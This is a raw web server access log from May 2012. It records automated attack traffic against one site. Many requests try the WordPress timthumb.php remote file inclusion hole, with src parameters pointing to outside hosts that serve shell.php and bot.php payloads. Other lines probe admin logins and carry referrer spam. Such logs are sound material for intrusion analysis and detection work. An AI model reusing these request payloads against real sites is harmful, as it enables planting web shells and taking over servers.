95.167.173.166 - - [14/May/2012:00:31:35 +0200] "GET /stats/admin/categories.php/login.php HTTP/1.1" 404 318 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
95.167.173.166 - - [14/May/2012:00:31:36 +0200] "GET /stats/admin/file_manager.php/login.php HTTP/1.1" 404 320 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
95.167.173.166 - - [14/May/2012:00:31:36 +0200] "GET /stats/admin/banner_manager.php/login.php HTTP/1.1" 404 322 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
95.167.173.166 - - [14/May/2012:00:31:37 +0200] "GET /admin/categories.php/login.php HTTP/1.1" 404 312 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
95.167.173.166 - - [14/May/2012:00:31:38 +0200] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 314 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
95.167.173.166 - - [14/May/2012:00:31:39 +0200] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 316 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
78.137.37.171 - - [14/May/2012:00:32:15 +0200] "GET /logs/access_log HTTP/1.0" 200 972 "http://playdooandroid.info/sitemap182.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:00:32:15 +0200] "GET /logs/access_log HTTP/1.0" 200 1201 "http://playdooandroid.info/sitemap182.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)"
78.137.37.171 - - [14/May/2012:00:32:15 +0200] "GET /logs/access_log HTTP/1.0" 200 1383 "http://playdooandroid.info/sitemap182.html" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.0 [en]"
78.137.37.171 - - [14/May/2012:00:32:15 +0200] "GET /logs/access_log HTTP/1.0" 200 1582 "http://playdooandroid.info/sitemap182.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)"
78.137.37.171 - - [14/May/2012:00:32:16 +0200] "GET /logs/access_log HTTP/1.0" 200 1787 "http://playdooandroid.info/sitemap182.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
94.23.98.100 - - [14/May/2012:00:32:22 +0200] "GET /stats//wp-content/themes/Avenue/?src=http://flickr.com.musicui.com/bot.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
94.23.98.100 - - [14/May/2012:00:32:27 +0200] "GET /stats//wp-content/themes/Avenue/?src=http://flickr.com.musicui.com/sh.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
187.108.193.245 - - [14/May/2012:00:32:28 +0200] "GET /logs//wp-content/themes/bueno/timthumb.php?src=http://wordpress.com.airatrip.com/temp/dapetsatu.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
94.23.98.100 - - [14/May/2012:00:32:32 +0200] "GET /stats//wp-content/themes/Avenue/?src=http://flickr.com.musicui.com/xx.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
94.23.98.100 - - [14/May/2012:00:32:37 +0200] "GET //wp-content/themes/Avenue/?src=http://flickr.com.musicui.com/bot.php HTTP/1.1" 404 308 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
94.23.98.100 - - [14/May/2012:00:32:42 +0200] "GET //wp-content/themes/Avenue/?src=http://flickr.com.musicui.com/sh.php HTTP/1.1" 404 308 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
94.23.98.100 - - [14/May/2012:00:32:42 +0200] "GET //wp-content/themes/Avenue/?src=http://flickr.com.musicui.com/xx.php HTTP/1.1" 404 308 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:33:09 +0200] "GET /stats//wp-content/themes/eNews/tools/timthumb.php?src= HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:33:09 +0200] "GET /stats//wp-content/themes/eNews/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:33:09 +0200] "GET /stats//wp-content/themes/eNews/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:33:10 +0200] "GET //wp-content/themes/eNews/tools/timthumb.php?src= HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:33:10 +0200] "GET //wp-content/themes/eNews/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:33:10 +0200] "GET //wp-content/themes/eNews/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:00:35:43 +0200] "GET /logs/access_log HTTP/1.0" 200 5085 "http://playdooandroid.info/sitemap189.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT) ::ELNSB50::000061100320025802a00111000000000507000900000000"
78.137.37.171 - - [14/May/2012:00:35:43 +0200] "GET /logs/access_log HTTP/1.0" 200 5327 "http://playdooandroid.info/sitemap189.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
78.137.37.171 - - [14/May/2012:00:35:43 +0200] "GET /logs/access_log HTTP/1.0" 200 5513 "http://playdooandroid.info/sitemap189.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Deepnet Explorer 1.5.0; .NET CLR 1.0.3705)"
78.137.37.171 - - [14/May/2012:00:35:44 +0200] "GET /logs/access_log HTTP/1.0" 200 5742 "http://playdooandroid.info/sitemap189.html" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)"
78.137.37.171 - - [14/May/2012:00:35:44 +0200] "GET /logs/access_log HTTP/1.0" 200 5932 "http://playdooandroid.info/sitemap189.html" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4"
202.167.218.201 - - [14/May/2012:00:35:51 +0200] "GET /admin/categories.php/login.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
202.167.218.201 - - [14/May/2012:00:35:51 +0200] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
202.167.218.201 - - [14/May/2012:00:35:51 +0200] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.132.213.162 - - [14/May/2012:00:36:50 +0200] "GET /logs/access_log HTTP/1.0" 200 6724 "http://androideosoft.info/sitemap224.html" "Opera/8.01 (Windows NT 5.1)"
95.132.213.162 - - [14/May/2012:00:36:53 +0200] "GET /logs/access_log HTTP/1.0" 200 6887 "http://androideosoft.info/sitemap224.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.1.4322)"
95.132.213.162 - - [14/May/2012:00:36:56 +0200] "GET /logs/access_log HTTP/1.0" 200 7092 "http://androideosoft.info/sitemap224.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
123.194.208.79 - - [14/May/2012:00:36:59 +0200] "GET /admin/categories.php/login.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.132.213.162 - - [14/May/2012:00:36:59 +0200] "GET /logs/access_log HTTP/1.0" 200 7522 "http://androideosoft.info/sitemap224.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)"
123.194.208.79 - - [14/May/2012:00:37:04 +0200] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
123.194.208.79 - - [14/May/2012:00:37:04 +0200] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.132.213.162 - - [14/May/2012:00:37:06 +0200] "GET /logs/access_log HTTP/1.0" 200 8157 "http://androideosoft.info/sitemap224.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)"
94.228.180.218 - - [14/May/2012:00:38:52 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
94.228.180.218 - - [14/May/2012:00:38:52 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
78.137.37.171 - - [14/May/2012:00:39:10 +0200] "GET /logs/access_log HTTP/1.0" 200 8657 "http://playdooandroid.info/sitemap196.html" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0"
78.137.37.171 - - [14/May/2012:00:39:10 +0200] "GET /logs/access_log HTTP/1.0" 200 8904 "http://playdooandroid.info/sitemap196.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:"
78.137.37.171 - - [14/May/2012:00:39:11 +0200] "GET /logs/access_log HTTP/1.0" 200 9137 "http://playdooandroid.info/sitemap196.html" "Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)"
78.137.37.171 - - [14/May/2012:00:39:11 +0200] "GET /logs/access_log HTTP/1.0" 200 9330 "http://playdooandroid.info/sitemap196.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)"
78.137.37.171 - - [14/May/2012:00:39:12 +0200] "GET /logs/access_log HTTP/1.0" 200 9525 "http://playdooandroid.info/sitemap196.html" "Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)"
67.128.149.182 - - [14/May/2012:00:40:44 +0200] "GET /stats//wp-content/themes/maimpok/functions/thumb/thumb.php?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
67.128.149.182 - - [14/May/2012:00:40:46 +0200] "GET //wp-content/themes/maimpok/functions/thumb/thumb.php?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.228.180.218 - - [14/May/2012:00:41:27 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
94.228.180.218 - - [14/May/2012:00:41:27 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
78.40.230.120 - - [14/May/2012:00:41:32 +0200] "GET /stats/wp-content/themes/Cion/timthumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
78.40.230.120 - - [14/May/2012:00:41:34 +0200] "GET /stats/wp-content/themes/Cion/timthumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
78.40.230.120 - - [14/May/2012:00:41:35 +0200] "GET /wp-content/themes/Cion/timthumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
78.40.230.120 - - [14/May/2012:00:41:36 +0200] "GET /wp-content/themes/Cion/timthumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
89.33.197.242 - - [14/May/2012:00:41:59 +0200] "GET /stats//wp-content/themes/modularity/tools/timthumb.php?src= HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:41:59 +0200] "GET /stats//wp-content/themes/modularity/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:42:00 +0200] "GET /stats//wp-content/themes/modularity/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:42:00 +0200] "GET //wp-content/themes/modularity/tools/timthumb.php?src= HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:42:00 +0200] "GET //wp-content/themes/modularity/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:42:01 +0200] "GET //wp-content/themes/modularity/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:00:42:40 +0200] "GET /logs/access_log HTTP/1.0" 200 13095 "http://playdooandroid.info/sitemap203.html" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01"
78.137.37.171 - - [14/May/2012:00:42:41 +0200] "GET /logs/access_log HTTP/1.0" 200 13278 "http://playdooandroid.info/sitemap203.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)"
78.137.37.171 - - [14/May/2012:00:42:41 +0200] "GET /logs/access_log HTTP/1.0" 200 13515 "http://playdooandroid.info/sitemap203.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:00:42:42 +0200] "GET /logs/access_log HTTP/1.0" 200 13721 "http://playdooandroid.info/sitemap203.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
78.137.37.171 - - [14/May/2012:00:42:42 +0200] "GET /logs/access_log HTTP/1.0" 200 13908 "http://playdooandroid.info/sitemap203.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
184.173.6.208 - - [14/May/2012:00:44:18 +0200] "GET /stats//wp-content/themes/forewordthinking/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:00:44:19 +0200] "GET //wp-content/themes/forewordthinking/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:00:44:21 +0200] "GET /stats//wp-content/themes/forewordthinking/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:00:44:22 +0200] "GET //wp-content/themes/forewordthinking/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.46.199.202 - - [14/May/2012:00:45:04 +0200] "GET /stats//wp-content/themes/u-design/scripts/timthumb.php?src=http://flickr.com.maispatos.com.br/content/gif.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
78.46.199.202 - - [14/May/2012:00:45:05 +0200] "GET //wp-content/themes/u-design/scripts/timthumb.php?src=http://flickr.com.maispatos.com.br/content/gif.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
184.173.6.208 - - [14/May/2012:00:45:13 +0200] "GET /stats//wp-content/themes/heli-1-wordpress-theme/images/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:00:45:14 +0200] "GET //wp-content/themes/heli-1-wordpress-theme/images/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:00:45:41 +0200] "GET /stats//wp-content/themes/heli-1-wordpress-theme/images/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:00:45:42 +0200] "GET //wp-content/themes/heli-1-wordpress-theme/images/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.137.37.171 - - [14/May/2012:00:46:09 +0200] "GET /logs/access_log HTTP/1.0" 200 16870 "http://playdooandroid.info/sitemap210.html" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)"
78.137.37.171 - - [14/May/2012:00:46:09 +0200] "GET /logs/access_log HTTP/1.0" 200 17054 "http://playdooandroid.info/sitemap210.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)"
78.137.37.171 - - [14/May/2012:00:46:10 +0200] "GET /logs/access_log HTTP/1.0" 200 17266 "http://playdooandroid.info/sitemap210.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:00:46:10 +0200] "GET /logs/access_log HTTP/1.0" 200 17497 "http://playdooandroid.info/sitemap210.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:00:46:11 +0200] "GET /logs/access_log HTTP/1.0" 200 17767 "http://playdooandroid.info/sitemap210.html" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4"
220.181.108.152 - - [14/May/2012:00:46:16 +0200] "GET / HTTP/1.1" 200 945 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
95.132.213.162 - - [14/May/2012:00:47:23 +0200] "GET /logs/access_log HTTP/1.0" 200 18133 "http://androideosoft.info/sitemap231.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)"
95.132.213.162 - - [14/May/2012:00:47:24 +0200] "GET /logs/access_log HTTP/1.0" 200 18344 "http://androideosoft.info/sitemap231.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)"
95.132.213.162 - - [14/May/2012:00:47:26 +0200] "GET /logs/access_log HTTP/1.0" 200 18563 "http://androideosoft.info/sitemap231.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
95.132.213.162 - - [14/May/2012:00:47:29 +0200] "GET /logs/access_log HTTP/1.0" 200 18764 "http://androideosoft.info/sitemap231.html" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)"
95.132.213.162 - - [14/May/2012:00:47:31 +0200] "GET /logs/access_log HTTP/1.0" 200 18966 "http://androideosoft.info/sitemap231.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
95.141.35.196 - - [14/May/2012:00:47:37 +0200] "GET /stats//wp-content/themes/ElegantEstate/timthumb.php?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 333 "-" "BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212"
95.141.35.196 - - [14/May/2012:00:47:38 +0200] "GET //wp-content/themes/ElegantEstate/timthumb.php?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 327 "-" "BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212"
184.173.6.208 - - [14/May/2012:00:48:14 +0200] "GET /stats/index.html//wp-content/themes/heli-1-wordpress-theme/images/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:00:48:15 +0200] "GET //wp-content/themes/heli-1-wordpress-theme/images/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:00:48:16 +0200] "GET /stats//wp-content/themes/heli-1-wordpress-theme/images/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
173.192.191.96 - - [14/May/2012:00:48:38 +0200] "GET /stats/log.keys.html/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.192.191.96 - - [14/May/2012:00:48:38 +0200] "GET /wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.192.191.96 - - [14/May/2012:00:48:38 +0200] "GET /stats/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.192.191.96 - - [14/May/2012:00:48:40 +0200] "GET /stats/index.html/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
174.121.213.238 - - [14/May/2012:00:48:44 +0200] "GET /stats/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
174.121.213.238 - - [14/May/2012:00:48:45 +0200] "GET /wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.192.191.96 - - [14/May/2012:00:48:48 +0200] "GET /stats/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.192.191.96 - - [14/May/2012:00:48:48 +0200] "GET /wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
94.23.53.171 - - [14/May/2012:00:49:11 +0200] "GET /stats/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
94.23.53.171 - - [14/May/2012:00:49:11 +0200] "GET /wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
201.67.155.235 - - [14/May/2012:00:49:29 +0200] "GET /stats/log.keys.html/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
201.67.155.235 - - [14/May/2012:00:49:30 +0200] "GET /wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
174.121.213.238 - - [14/May/2012:00:49:34 +0200] "GET /stats/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
174.121.213.238 - - [14/May/2012:00:49:34 +0200] "GET /wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:00:49:38 +0200] "GET /logs/access_log HTTP/1.0" 200 24266 "http://playdooandroid.info/sitemap217.html" "Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320)"
78.137.37.171 - - [14/May/2012:00:49:38 +0200] "GET /logs/access_log HTTP/1.0" 200 24459 "http://playdooandroid.info/sitemap217.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:00:49:39 +0200] "GET /logs/access_log HTTP/1.0" 200 24690 "http://playdooandroid.info/sitemap217.html" "Opera/8.01 (Windows NT 5.1)"
